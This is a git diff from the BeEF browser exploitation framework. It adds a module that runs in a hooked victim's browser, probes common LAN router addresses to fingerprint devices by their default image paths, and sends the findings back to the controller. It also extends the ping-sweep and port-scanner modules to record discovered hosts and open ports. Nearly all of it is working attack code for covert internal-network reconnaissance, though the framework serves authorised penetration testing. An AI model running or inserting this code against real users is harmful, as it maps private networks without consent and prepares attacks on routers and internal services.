+ {make:'Netgear',model:'FR318',graphic:'/images/../settingsFR318.gif'},
+ {make:'Netgear',model:'FR328S',graphic:'/images/../settingsFR328S.gif'},
+ {make:'Netgear',model:'FV318',graphic:'/images/../settingsFV318.gif'},
+ {make:'Netgear',model:'FVG318',graphic:'/images/../settingsFVG318.gif'},
+ {make:'Netgear',model:'FVL328',graphic:'/images/../settingsFVL328.gif'},
+ {make:'Netgear',model:'FVM318',graphic:'/images/../settingsFVM318.gif'},
+ {make:'Netgear',model:'FVS114',graphic:'/images/../settingsFVS114.gif'},
+ {make:'Netgear',model:'FVS124G',graphic:'/images/../settingsFVS124G.gif'},
+ {make:'Netgear',model:'FVS318',graphic:'/images/../settingsFVS318.gif'},
+ {make:'Netgear',model:'FVS328',graphic:'/images/../settingsFVS328.gif'},
+ {make:'Netgear',model:'FVS338',graphic:'/images/../settingsFVS338.gif'},
+ {make:'Netgear',model:'FVX538',graphic:'/images/../settingsFVX538.gif'},
+ {make:'Netgear',model:'FWAG114',graphic:'/images/../settingsFWAG114.gif'},
+ {make:'Netgear',model:'FWG114P',graphic:'/images/../settingsFWG114P.gif'},
+ {make:'Netgear',model:'GA302T',graphic:'/images/../settingsGA302T.gif'},
+ {make:'Netgear',model:'GA311',graphic:'/images/../settingsGA311.gif'},
+ {make:'Netgear',model:'GA511',graphic:'/images/../settingsGA511.gif'},
+ {make:'Netgear',model:'GA620',graphic:'/images/../settingsGA620.gif'},
+ {make:'Netgear',model:'GA621',graphic:'/images/../settingsGA621.gif'},
+ {make:'Netgear',model:'GA622T',graphic:'/images/../settingsGA622T.gif'},
+ {make:'Netgear',model:'HE102',graphic:'/images/../settingsHE102.gif'},
+ {make:'Netgear',model:'HR314',graphic:'/images/../settingsHR314.gif'},
+ {make:'Netgear',model:'JFS516',graphic:'/images/../settingsJFS516.gif'},
+ {make:'Netgear',model:'JFS524',graphic:'/images/../settingsJFS524.gif'},
+ {make:'Netgear',model:'JFS524F',graphic:'/images/../settingsJFS524F.gif'},
+ {make:'Netgear',model:'JGS516',graphic:'/images/../settingsJGS516.gif'},
+ {make:'Netgear',model:'JGS524',graphic:'/images/../settingsJGS524.gif'},
+ {make:'Netgear',model:'JGS524F',graphic:'/images/../settingsJGS524F.gif'},
+ {make:'Netgear',model:'KWGR614',graphic:'/images/../settingsKWGR614.gif'},
+ {make:'Netgear',model:'ME101',graphic:'/images/../settingsME101.gif'},
+ {make:'Netgear',model:'ME102',graphic:'/images/../settingsME102.gif'},
+ {make:'Netgear',model:'ME103',graphic:'/images/../settingsME103.gif'},
+ {make:'Netgear',model:'MR314',graphic:'/images/../settingsMR314.gif'},
+ {make:'Netgear',model:'MR814',graphic:'/images/../settingsMR814.gif'},
+ {make:'Netgear',model:'RH340',graphic:'/images/../settingsRH340.gif'},
+ {make:'Netgear',model:'RH348',graphic:'/images/../settingsRH348.gif'},
+ {make:'Netgear',model:'RM356',graphic:'/images/../settingsRM356.gif'},
+ {make:'Netgear',model:'RO318',graphic:'/images/../settingsRO318.gif'},
+ {make:'Netgear',model:'RP114',graphic:'/images/../settingsRP114.gif'},
+ {make:'Netgear',model:'RP334',graphic:'/images/../settingsRP334.gif'},
+ {make:'Netgear',model:'RP614',graphic:'/images/../settingsRP614.gif'},
+ {make:'Netgear',model:'RT311',graphic:'/images/../settingsRT311.gif'},
+ {make:'Netgear',model:'RT314',graphic:'/images/../settingsRT314.gif'},
+ {make:'Netgear',model:'RT328',graphic:'/images/../settingsRT328.gif'},
+ {make:'Netgear',model:'RT338',graphic:'/images/../settingsRT338.gif'},
+ {make:'Netgear',model:'WAB102',graphic:'/images/../settingsWAB102.gif'},
+ {make:'Netgear',model:'WAG102',graphic:'/images/../settingsWAG102.gif'},
+ {make:'Netgear',model:'WAG302',graphic:'/images/../settingsWAG302.gif'},
+ {make:'Netgear',model:'WAGL102',graphic:'/images/../settingsWAGL102.gif'},
+ {make:'Netgear',model:'WAGR614',graphic:'/images/../settingsWAGR614.gif'},
+ {make:'Netgear',model:'WG102',graphic:'/images/../settingsWG102.gif'},
+ {make:'Netgear',model:'WG111',graphic:'/images/../settingsWG111.gif'},
+ {make:'Netgear',model:'WG111T',graphic:'/images/../settingsWG111T.gif'},
+ {make:'Netgear',model:'WG302',graphic:'/images/../settingsWG302.gif'},
+ {make:'Netgear',model:'WG311',graphic:'/images/../settingsWG311.gif'},
+ {make:'Netgear',model:'WG602',graphic:'/images/../settingsWG602.gif'},
+ {make:'Netgear',model:'WGE101',graphic:'/images/../settingsWGE101.gif'},
+ {make:'Netgear',model:'WGE111',graphic:'/images/../settingsWGE111.gif'},
+ {make:'Netgear',model:'WGL102',graphic:'/images/../settingsWGL102.gif'},
+ {make:'Netgear',model:'WGM124',graphic:'/images/../settingsWGM124.gif'},
+ {make:'Netgear',model:'WGR101',graphic:'/images/../settingsWGR101.gif'},
+ {make:'Netgear',model:'WGR614',graphic:'/images/../settingsWGR614.gif'},
+ {make:'Netgear',model:'WGT624',graphic:'/images/../settingsWGT624.gif'},
+ {make:'Netgear',model:'WGT624SC',graphic:'/images/../settingsWGT624SC.gif'},
+ {make:'Netgear',model:'WGT634U',graphic:'/images/../settingsWGT634U.gif'},
+ {make:'Netgear',model:'WGU624',graphic:'/images/../settingsWGU624.gif'},
+ {make:'Netgear',model:'WGX102',graphic:'/images/../settingsWGX102.gif'},
+ {make:'Netgear',model:'WN121T',graphic:'/images/../settingsWN121T.gif'},
+ {make:'Netgear',model:'WN311B',graphic:'/images/../settingsWN311B.gif'},
+ {make:'Netgear',model:'WN311T',graphic:'/images/../settingsWN311T.gif'},
+ {make:'Netgear',model:'WN511B',graphic:'/images/../settingsWN511B.gif'},
+ {make:'Netgear',model:'WN511T',graphic:'/images/../settingsWN511T.gif'},
+ {make:'Netgear',model:'WN802T',graphic:'/images/../settingsWN802T.gif'},
+ {make:'Netgear',model:'WNR834B',graphic:'/images/../settingsWNR834B.gif'},
+ {make:'Netgear',model:'WNR834M',graphic:'/images/../settingsWNR834M.gif'},
+ {make:'Netgear',model:'WNR854T',graphic:'/images/../settingsWNR854T.gif'},
+ {make:'Netgear',model:'WPN802',graphic:'/images/../settingsWPN802.gif'},
+ {make:'Netgear',model:'WPN824',graphic:'/images/../settingsWPN824.gif'},
+ {make:'Netgear',model:'XM128',graphic:'/images/../settingsXM128.gif'},
+ {make:'Thomson',model:'Cable Modem A801',graphic:'/images/thomson.gif'},
+ {make:'Vigor',model:'2600V',graphic:'/images/logo1.jpg'},
+ {make:'Linksys',model:'WRT54GL',graphic:'/WRT56GL.gif'},
+ {make:'Linksys',model:'WRT54GC',graphic:'/UI_Linksys.gif'},
+ {make:'Linksys',model:'WRT54G',graphic:'/WRT54G.gif'},
+ {make:'Linksys',model:'WRT54GS',graphic:'/UILinksys.gif'},
+ {make:'ZyXEL',model:'Prestige 660H61',graphic:'/dslroutery/imgshop/full/NETZ1431.jpg'},
+ {make:'ZyXEL',model:'Zywall',graphic:'/images/Logo.gif'},
+ {make:'Sitecom',model:'WL114',graphic:'/slogo.gif'},
+ {make:'2Wire',model:'1000 Series',graphic:'/base/web/def/def/images/nav_sl_logo.gif'},
+ {make:'SurfinBird',model:'313',graphic:'/images/help_p.gif'},
+ {make:'SMC',model:'7004ABR',graphic:'/images/logo.gif'},
+ {make:'DLink',model:'DI524',graphic:'/m524.gif'},
+ {make:'Cisco',model:'2600',graphic:'/images/logo.png'},
+ {make:'ASUS',model:'RT Series',graphic:'/images/EZSetup_button.gif'}
+ ];
+
+ // No signatures for commented out IPs
+ var ips = [
+ {ip:'192.168.1.30',make:'DLink'},
+ {ip:'192.168.1.50',make:'DLink'},
+ {ip:'192.168.2.1',make:'SMC'},
+ //{ip:'192.168.2.1',make:'Accton'},
+ //{ip:'192.168.1.1',make:'3Com'},
+ //{ip:'192.168.1.1',make:'AirLink'},
+ //{ip:'192.168.1.1',make:'Arescom'},
+ //{ip:'192.168.1.1',make:'Teletronics'},
+ //{ip:'192.168.1.1',make:'Dell'},
+ {ip:'192.168.1.1',make:'DLink'},
+ {ip:'192.168.1.1',make:'Linksys'},
+ {ip:'192.168.1.1',make:'ZyXEL'},
+ {ip:'192.168.1.1',make:'ASUS'},
+ {ip:'192.168.0.1',make:'DLink'},
+ {ip:'192.168.0.1',make:'Netgear'},
+ {ip:'192.168.0.1',make:'Linksys'},
+ {ip:'192.168.0.1',make:'SurfinBird'},
+ {ip:'192.168.0.1',make:'ASUS'},
+ {ip:'192.168.0.227',make:'Netgear'},
+ {ip:'192.168.0.254',make:'DLink'},
+ {ip:'192.168.1.225',make:'Linksys'},
+ {ip:'192.168.1.226',make:'Linksys'},
+ {ip:'192.168.1.245',make:'Linksys'},
+ {ip:'192.168.1.246',make:'Linksys'},
+ {ip:'192.168.1.251',make:'Linksys'},
+ {ip:'192.168.100.1',make:'Thomson'},
+ {ip:'192.168.1.254',make:'ZyXEL'},
+ {ip:'192.168.1.254',make:'2Wire'},
+ {ip:'192.168.0.1',make:'Vigor'},
+ {ip:'192.168.123.254',make:'Sitecom'},
+ //{ip:'10.0.1.1',make:'Apple'},
+ {ip:'10.1.1.1',make:'DLink'},
+ {ip:'10.0.0.1',make:'ZyXEL'},
+ //{ip:'10.0.0.2',make:'Aceex'},
+ //{ip:'10.0.0.2',make:'Bausch'},
+ //{ip:'10.0.0.2',make:'E-Tech'},
+ //{ip:'10.0.0.2',make:'JAHT'},
+ {ip:'192.168.1.254',make:'2Wire'},
+ {ip:'192.168.65.1',make:'Cisco'}
+ //{ip:'192.168.100.1',make:'Motorola'},
+ //{ip:'192.168.100.1',make:'Ambit'},
+ ];
+
+ var guesses = [
+ {host:'10.1.1.1',label:'Device',labelText:'DLink',port:80},
+ {host:'10.0.0.1',label:'Device',labelText:'ZyXEL',port:80},
+ {host:'10.0.0.2',label:'Device',labelText:'Aceex,Bausch,E-Tech,JAHT',port:80},
+ {host:'10.0.0.138',label:'Device',labelText:'Alcatel',port:80},
+ {host:'10.0.1.1',label:'Device',labelText:'Apple',port:80},
+ {host:'192.168.0.1',label:'Device',labelText:'DLink,Netgear,ASUS,Linksys,Sitecom,Belkin',port:80},
+ {host:'192.168.0.227',label:'Device',labelText:'Netgear',port:80},
+ {host:'192.168.0.254',label:'Device',labelText:'DLink,Sitecom/Linux IP Cop',port:80},
+ {host:'192.168.1.1',label:'Device',labelText:'3Com,AirLink,Linksys,Arescom,ASUS,Dell,DLink,ZyXEL,Teletronics',port:80},
+ {host:'192.168.1.30',label:'Device',labelText:'DLink',port:80},
+ {host:'192.168.1.50',label:'Device',labelText:'DLink,Linksys',port:80},
+ {host:'192.168.1.225',label:'Device',labelText:'Linksys',port:80},
+ {host:'192.168.1.226',label:'Device',labelText:'Linksys',port:80},
+ {host:'192.168.1.245',label:'Device',labelText:'Linksys',port:80},
+ {host:'192.168.1.246',label:'Device',labelText:'Linksys',port:80},
+ {host:'192.168.1.251',label:'Device',labelText:'Linksys',port:80},
+ {host:'192.168.1.254',label:'Device',labelText:'ZyXEL',port:80},
+ {host:'192.168.2.1',label:'Device',labelText:'Accton,Belkin,Microsoft,SMC',port:80},
+ {host:'192.168.2.25',label:'Device',labelText:'SMC',port:80},
+ {host:'192.168.8.1',label:'Device',labelText:'Aceex',port:80},
+ {host:'192.168.11.1',label:'Device',labelText:'Buffalo',port:80},
+ {host:'192.168.62.1',label:'Device',labelText:'Canyon',port:80},
+ {host:'192.168.100.1',label:'Device',labelText:'Ambit,Thomson,Motorola',port:80},
+ {host:'192.168.123.254',label:'Device',labelText:'US Robotics',port:80},
+ {host:'192.168.123.254',label:'Device',labelText:'Sitecom',port:80},
+ {host:'192.168.254.254',label:'Device',labelText:'Flowpoint',port:80},
+ {host:'192.168.254.1',label:'Device',labelText:'BT M5861,2Wire',port:80}
+ ];
+
+ lanScanner = {timeout:1,probes:0};
+ //lol pardon the innuendo
+ lanScanner.handleProbe = function(portObj) {
+ if(portObj.init == 1) {
+ lanScanner.addDevice({host:portObj.host,make:portObj.make,model:portObj.model});
+ document.body.removeChild(portObj);
+ }
+ }
+ // ie sucks! onload doesn't work unless specified directly in the document
+ // that's why I have to do this :(
+ lanScanner.handleConnection = function(portObj) {
+ if(portObj.init == 1) {
+ if(beef.browser.isIE()) {
+ portObj.end = new Date().getTime();
+ if(portObj.end - portObj.start > 15000) {
+ document.body.removeChild(portObj);
+ return false;
+ }
+ }
+ var obj = portObj.store;
+ obj.status = 'Open';
+ lanScanner.addHost(obj);
+ document.body.removeChild(portObj);
+ } else {
+ portObj.start = new Date().getTime();
+ }
+ }
+ lanScanner.runScan = function() {
+ var obj, portObj;
+ guessesLen = guesses.length;
+ for(var i=0;i", <%= @command_id %>, 'proto=http&ip='+obj.host+'&port='+obj.port+'&service='+this.getPortName(obj.port));
+ lanScanner.fingerPrint(obj.host);
+ }
+ lanScanner.addDevice = function(obj) {
+ beef.debug("[JS LAN Scanner] Found " + obj.make + ' ' + obj.model + ' [ip: ' + obj.host + ']');
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, 'ip='+obj.host+'&device='+obj.make+' '+obj.model);
+ }
+ lanScanner.destroyConnections = function() {
+ var guessesLen = guesses.length;
+ for(var f=0;f", <%= @command_id %>, "Starting scan ("+guessesLen+" IPs)");
+ lanScanner.runScan();
+ //lanScanner.destroyConnections();
+});
+
diff --git a/modules/network/jslanscanner/config.yaml b/modules/network/jslanscanner/config.yaml
new file mode 100644
index 000000000..8557f190f
--- /dev/null
+++ b/modules/network/jslanscanner/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# Ported to BeEF from JsLanScanner: https://code.google.com/p/jslanscanner/source/browse/trunk/lan_scan/js/lan_scan.js
+#
+beef:
+ module:
+ fingerprint_routers:
+ enable: true
+ category: "Network"
+ name: "Fingerprint Routers"
+ description: "This module attempts to discover network routers on the local network of the hooked browser. It scans for web servers on IP addresses commonly used by routers. It uses a signature based approach - based on default image paths for known network devices - to determine if the web server is a router web interface.
Ported to BeEF from JsLanScanner.
Note: The user may see authentication popups in the event any of the target IP addresses are using HTTP authentication."
+ authors: ["Gareth Heyes"]
+ target:
+ user_notify: ["FF", "S"]
+ not_working: ["C", "IE"]
diff --git a/modules/network/jslanscanner/module.rb b/modules/network/jslanscanner/module.rb
new file mode 100644
index 000000000..0352c31ae
--- /dev/null
+++ b/modules/network/jslanscanner/module.rb
@@ -0,0 +1,47 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Fingerprint_routers < BeEF::Core::Command
+
+ def self.options
+ return [
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['results'] = @datastore['results'] if not @datastore['results'].nil?
+ save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+ if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&service=(.+)/
+ proto = $1
+ ip = $2
+ port = $3
+ service = $4
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+ if !ip.nil?
+ print_debug("Hooked browser found network service " + service + " [proto: #{proto}, ip: #{ip}, port: #{port}]")
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => service, :cid => cid)
+ r.save
+ end
+ elsif @datastore['results'] =~ /^ip=(.+)&device=(.+)/
+ ip = $1
+ device = $2
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+ if !ip.nil?
+ print_debug("Hooked browser found network device " + device + " [ip: #{ip}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => device, :cid => cid)
+ r.save
+ end
+ end
+ end
+
+ end
+end
diff --git a/modules/network/ping_sweep/module.rb b/modules/network/ping_sweep/module.rb
index 0eea04f61..4081ff2f8 100644
--- a/modules/network/ping_sweep/module.rb
+++ b/modules/network/ping_sweep/module.rb
@@ -26,5 +26,21 @@ class Ping_sweep < BeEF::Core::Command
content['fail'] = 'No active hosts have been discovered.'
end
save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+
+ # save the network host
+ if @datastore['results'] =~ /host=([\d\.]+) is alive/
+ ip = $1
+ print_debug("Hooked browser has network interface #{ip}")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
+ r.save
+ end
+ end
+
end
end
diff --git a/modules/network/port_scanner/command.js b/modules/network/port_scanner/command.js
index b10897376..07f5c7c8c 100644
--- a/modules/network/port_scanner/command.js
+++ b/modules/network/port_scanner/command.js
@@ -9,9 +9,9 @@ beef.execute(function() {
var blocked_ports = [ 1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37, 42, 43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113, 115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514, 515, 526, 530, 531, 532, 540, 556, 563, 587, 601, 636, 993, 995, 2049, 3659, 4045, 6000, 6665, 6666, 6667, 6668, 6669, 65535 ];
- var default_ports = [ 1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088 ];
+ var default_ports = [ 1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,631,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088 ];
- var default_services = { '1':'tcpmux','5':'rje','7':'echo','9':'msn','15':'netstat','20':'ftp-data','21':'ftp','22':'ssh','23':'telnet','25':'smtp','26':'rsftp','29':'msgicp','33':'dsp','37':'time','42':'nameserver','43':'whois','53':'dns','67':'dhcps','68':'dhcpc','69':'tftp','70':'gopher','76':'deos','79':'finger','80':'http','88':'kerberos-sec','90':'dnsix','98':'linuxconf','101':'hostname','106':'pop3pw','109':'pop2','110':'pop3','111':'rpcbind','113':'auth','114':'audionews','115':'sftp','118':'sqlserv','119':'nntp','123':'ntp','129':'pwdgen','132':'cisco-sys','133':'statsrv','135':'msrpc','136':'profile','137':'netbios-ns','138':'netbios-dgm','139':'netbios-ssn','143':'imap','144':'news','156':'sqlserv','158':'pcmail-srv','161':'snmp','162':'snmptrap','168':'rsvd','174':'mailq','177':'xdmcp','194':'irc','197':'dls','209':'tam','213':'ipx','217':'dbase','219':'uarps','220':'imap3','223':'cdc','264':'bgmp','315':'dpsi','316':'decauth','346':'zserv','353':'ndsauth','389':'ldap','413':'smsp','414':'infoseek','415':'bnet','416':'silverplatter','440':'sgcp','443':'https','444':'snpp','445':'microsoft-ds','453':'creativeserver','454':'contentserver','456':'macon','457':'scohelp','458':'appleqtc','462':'datasurfsrvsec','464':'kpasswd5','465':'smtps','466':'digital-vrc','480':'loadsrv','486':'sstats','497':'retrospect','500':'isakmp','501':'stmf','516':'videotex','518':'ntalk','522':'ulp','523':'ibm-db2','524':'ncp','525':'timed','526':'tempo','533':'netwall','535':'iiop','538':'gdomap','540':'uucp','541':'uucp-rlogin','542':'commerce','543':'klogin','544':'kshell','545':'ekshell','546':'dhcpconf','547':'dhcpserv','556':'remotefs','557':'openvms-sysipc','560':'rmonitor','561':'monitor','563':'snews','564':'9pfs','625':'apple-xsrvr-admin','626':'apple-imap-admin','636':'ldapssl','637':'lanserver','660':'mac-srvr-admin','664':'secure-aux-bus','666':'doom','683':'corba-iiop','740':'netcp','741':'netgw','742':'netrcs','744':'flexlm','747':'fujitsu-dev','748':'ris-cm','749':'kerberos-adm','750':'kerberos','751':'kerberos_master','752':'qrh','753':'rrh','754':'krb_prop','758':'nlogin','760':'krbupdate','761':'kpasswd','762':'quotad','763':'cycleserv','764':'omserv','765':'webster','767':'phonebook','771':'rtip','773':'submit','774':'rpasswd','775':'entomb','776':'wpages','780':'wpgs','781':'hp-collector','782':'hp-managed-node','783':'spamassassin','786':'concert','787':'qsc','799':'controlit','800':'mdbs_daemon','801':'device','808':'ccproxy-http','871':'supfilesrv','873':'rsync','888':'accessbuilder','898':'sun-manageconsole','901':'samba-swat','953':'rndc','989':'ftps-data','990':'ftps','992':'telnets','993':'imaps','994':'ircs','995':'pop3s','996':'xtreelic','997':'maitrd','998':'busboy','999':'garcon','1000':'cadlock','1002':'windows-icfw','1008':'ufsd','1023':'netvenuechat','1024':'kdm','1080':'socks','8080':'tomcat','8443':'tomcat','8050':'coldfusion','3306':'mysql','5432':'postgres','1521 ':'oracle','1433':'mssql','3389':'msrdp','10088':'zendserver' };
+ var default_services = { '1':'tcpmux','5':'rje','7':'echo','9':'msn','15':'netstat','20':'ftp-data','21':'ftp','22':'ssh','23':'telnet','25':'smtp','26':'rsftp','29':'msgicp','33':'dsp','37':'time','42':'nameserver','43':'whois','53':'dns','67':'dhcps','68':'dhcpc','69':'tftp','70':'gopher','76':'deos','79':'finger','80':'http','88':'kerberos-sec','90':'dnsix','98':'linuxconf','101':'hostname','106':'pop3pw','109':'pop2','110':'pop3','111':'rpcbind','113':'auth','114':'audionews','115':'sftp','118':'sqlserv','119':'nntp','123':'ntp','129':'pwdgen','132':'cisco-sys','133':'statsrv','135':'msrpc','136':'profile','137':'netbios-ns','138':'netbios-dgm','139':'netbios-ssn','143':'imap','144':'news','156':'sqlserv','158':'pcmail-srv','161':'snmp','162':'snmptrap','168':'rsvd','174':'mailq','177':'xdmcp','194':'irc','197':'dls','209':'tam','213':'ipx','217':'dbase','219':'uarps','220':'imap3','223':'cdc','264':'bgmp','315':'dpsi','316':'decauth','346':'zserv','353':'ndsauth','389':'ldap','413':'smsp','414':'infoseek','415':'bnet','416':'silverplatter','440':'sgcp','443':'https','444':'snpp','445':'microsoft-ds','453':'creativeserver','454':'contentserver','456':'macon','457':'scohelp','458':'appleqtc','462':'datasurfsrvsec','464':'kpasswd5','465':'smtps','466':'digital-vrc','480':'loadsrv','486':'sstats','497':'retrospect','500':'isakmp','501':'stmf','516':'videotex','518':'ntalk','522':'ulp','523':'ibm-db2','524':'ncp','525':'timed','526':'tempo','533':'netwall','535':'iiop','538':'gdomap','540':'uucp','541':'uucp-rlogin','542':'commerce','543':'klogin','544':'kshell','545':'ekshell','546':'dhcpconf','547':'dhcpserv','556':'remotefs','557':'openvms-sysipc','560':'rmonitor','561':'monitor','563':'snews','564':'9pfs','625':'apple-xsrvr-admin','626':'apple-imap-admin','631':'ipp','636':'ldapssl','637':'lanserver','660':'mac-srvr-admin','664':'secure-aux-bus','666':'doom','683':'corba-iiop','740':'netcp','741':'netgw','742':'netrcs','744':'flexlm','747':'fujitsu-dev','748':'ris-cm','749':'kerberos-adm','750':'kerberos','751':'kerberos_master','752':'qrh','753':'rrh','754':'krb_prop','758':'nlogin','760':'krbupdate','761':'kpasswd','762':'quotad','763':'cycleserv','764':'omserv','765':'webster','767':'phonebook','771':'rtip','773':'submit','774':'rpasswd','775':'entomb','776':'wpages','780':'wpgs','781':'hp-collector','782':'hp-managed-node','783':'spamassassin','786':'concert','787':'qsc','799':'controlit','800':'mdbs_daemon','801':'device','808':'ccproxy-http','871':'supfilesrv','873':'rsync','888':'accessbuilder','898':'sun-manageconsole','901':'samba-swat','953':'rndc','989':'ftps-data','990':'ftps','992':'telnets','993':'imaps','994':'ircs','995':'pop3s','996':'xtreelic','997':'maitrd','998':'busboy','999':'garcon','1000':'cadlock','1002':'windows-icfw','1008':'ufsd','1023':'netvenuechat','1024':'kdm','1080':'socks','1434':'ms-sql-m','4489':'radmin','6000':'x11','6446':'mysql-proxy','8080':'tomcat','8443':'tomcat','8050':'coldfusion','3306':'mysql','5432':'postgres','1521 ':'oracle','1433':'mssql','3389':'msrdp','10000':'webmin','10088':'zendserver','11371':'hkp' };
var host = '<%= @ipHost %>';
// TODO: Adjust times for each browser
@@ -106,7 +106,7 @@ beef.execute(function() {
{
process_port_cors = true;
port_status_cors = 4; // blocked
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=CORS: Port ' + port_ + ' is BLOCKED');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is BLOCKED');}
return;
}
@@ -145,7 +145,7 @@ beef.execute(function() {
if (interval < closetimeout)
{
port_status_cors = 1; // closed
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=CORS: Port ' + port_ + ' is CLOSED');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is CLOSED');}
} else
{
port_status_cors = 2; // open
@@ -154,7 +154,7 @@ beef.execute(function() {
{
known_service = "(" + default_services[port_] + ")";
}
- beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=CORS: Port ' + port_ + ' is OPEN ' + known_service);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is OPEN ' + known_service);
}
}
@@ -163,7 +163,7 @@ beef.execute(function() {
clearInterval(intID_cors);
process_port_cors = true;
port_status_cors = 3; // timeout
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=CORS: Port ' + port_ + ' is TIMEOUT');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is TIMEOUT');}
}
return;
}
@@ -176,7 +176,7 @@ beef.execute(function() {
{
process_port_ws = true;
port_status_ws = 4; // blocked
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=WebSocket: Port ' + port_ + ' is BLOCKED');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is BLOCKED');}
return;
}
@@ -222,7 +222,7 @@ beef.execute(function() {
if (interval < closetimeout)
{
port_status_ws = 1; // closed
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=WebSocket: Port ' + port_ + ' is CLOSED');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is CLOSED');}
} else
{
port_status_ws = 2; // open
@@ -231,7 +231,7 @@ beef.execute(function() {
{
known_service = "(" + default_services[port_] + ")";
}
- beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=WebSocket: Port ' + port_ + ' is OPEN ' + known_service);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is OPEN ' + known_service);
}
ws_scan.close();
}
@@ -241,7 +241,7 @@ beef.execute(function() {
clearInterval(intID_ws);
process_port_ws = true;
port_status_ws = 3; // timeout
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=WebSocket: Port ' + port_ + ' is TIMEOUT');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is TIMEOUT');}
ws_scan.close();
}
return;
@@ -264,7 +264,7 @@ beef.execute(function() {
if (process_port_http == false)
{
port_status_http = 1; // closed
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=HTTP: Port ' + port_ + ' is CLOSED');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=HTTP: Port ' + port_ + ' is CLOSED');}
clearInterval(intID_http);
}
process_port_http = true;
@@ -297,7 +297,7 @@ beef.execute(function() {
{
known_service = "(" + default_services[port_] + ")";
}
- beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=HTTP: Port ' + port_ + ' is OPEN ' + known_service);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=HTTP: Port ' + port_ + ' is OPEN ' + known_service);
}
}
, 1);
@@ -311,7 +311,7 @@ beef.execute(function() {
return;
} else
{
- beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=Scanning: ' + ports_list);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=Scanning '+host+' [ports: ' + ports_list + ']');
}
count = 0;
